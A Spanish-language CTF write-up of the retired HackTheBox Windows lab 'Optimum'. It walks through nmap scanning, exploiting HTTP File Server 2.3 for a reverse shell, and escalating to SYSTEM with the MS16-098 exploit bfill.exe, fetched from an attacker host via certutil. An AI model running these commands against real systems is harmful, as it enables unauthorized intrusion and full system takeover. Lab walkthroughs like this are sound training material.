Optimum Write-Up

Fecha de lanzamiento18 Mar 2017
EstadoRetirada
DificultadEasy
PlataformaWindows
IP10.10.10.8

Información de la máquina


RECONOCIMIENTO

Mediante el escaneo con la herramienta nmap podemos observar abierto el puerto 80.

nmap -p- --open -sS --min-rate 5000 -vvv -Pn -n 10.10.10.8 -oG allPorts
nmap -sCV -p80 10.10.10.8 -oN targeted

Tanto las cabeceras de respuesta como si inspeccionamos la web, podemos ver un servicio y una version, HTTP File Server 2.3.

EXPLOTACIÓN

Si buscamos en Internet información acerca de este software, vemos que existe un exploit publico en Github. Nos los descargamos y vamos a inspeccionarlo y modificar un par de cosillas.

Como observamos, tenemos que cambiar la IP Local así como el puerto por el que nos vamos a poner a la escucha. Ademas, si observamos los comentarios, vemos que tenemos que levantarnos un servidor por el puerto 80 y hostear el nc.exe.

Si lanzamos el exploit un par de veces, recibimos una shell como el usuario Kostas.

# Local

python3 -m http.server 80 # En el directorio donde tenemos el nc.exe
rlwrap nc -lvnp 443
python2 rejetto_hfs.py 10.10.10.8 80

ESCALADA DE PRIVILEGIOS

Para la escalada de privilegios, vamos a usar una herramienta de Github llamada Windows Exploit Suggester. Es una herramienta deprecada, bastante antigua y de primeras nos va a dar algún que otro fallo.

Una vez clonada la herramienta, hay que crear el archivo de base de datos. Para ello:

python2 windows-exploit-suggester.py --update

Nos va a crear un archivo de este tipo: 2024-05-26-mssb.xls

Antes de correr la herramienta, para que no nos de un fallo de Python, tenemos que correr los siguientes comandos:

pip2 uninstall xlrd
pip2 install xlrd==1.2.0

Una vez realizado, ya vamos a poder ejecutar la herramienta. Para ello, necesitamos ejecutar el comando systeminfo en la maquina victima, y el output guardarlo en un archivo txt local.

python2 windows-exploit-suggester.py --database 2024-05-26-mssb.xls --systeminfo systeminfo.txt

La herramienta nos devuelve vulnerabilidades a las que posiblemente la maquina sea vulnerable. Nosotros nos vamos a quedar con la siguiente: MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) – Important.

Si buscamos por el identificador de ExploitDB (41020) en Github, existe un repositorio que alberga un ejecutable con el nombre de bfill.exe.

Nos vamos a descargar ese ejecutable y lo vamos a enviar a la maquina victima. Para ello nos compartimos el archivo mediante un servidor web. Una vez en la maquina victima, lo ejecutamos y automáticamente obtenemos un SHELL como SYSTEM.

# Local

python3 -m http.server 80

# Maquina Victima

certutil -split -f -urlcache http://<iplocal>/bfill.exe bfill.exe
.\bfill.exe
Jorge Escrito por: